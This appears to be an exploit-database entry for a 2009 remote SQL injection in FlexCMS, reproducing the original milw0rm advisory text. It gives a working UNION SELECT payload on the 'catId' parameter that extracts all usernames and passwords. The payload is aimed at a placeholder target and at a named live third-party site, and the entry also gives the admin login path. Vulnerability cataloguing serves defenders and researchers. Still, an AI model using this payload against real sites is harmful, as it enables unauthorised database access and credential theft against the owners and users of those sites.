header-logo
Suggest Exploit
vendor:
FlexCMS
by:
MisterRichard
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: FlexCMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

FlexCMS Remote SQL Injection

Discovered by MisterRichard, FlexCMS is vulnerable to a Remote SQL Injection vulnerability. This vulnerability allows an attacker to gain access to the database of the application. The injection can be performed by appending a malicious SQL query to the vulnerable parameter in the URL. The vulnerable parameter is 'catId' and the malicious SQL query is 'union all select 1,2,3,concat(username,char(58),password)+from+users--'. This query will return the username and password of all users in the database.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in a SQL query.
Source

Exploit-DB raw data:

AUTHOR: MisterRichard

FlexCMS Remote SQL Injection

Discovered by MisterRichard.

Developer site: http://www.flexcms.dk/

Developer has not been notified.

Live demo:

Injection: www.target.com/flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--

http://www.radikalungdom.dk/flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--

Admin login site:

http://target.com/flexadmin/

Greetz, agonx, kollek, cardingnu

# milw0rm.com [2009-02-09]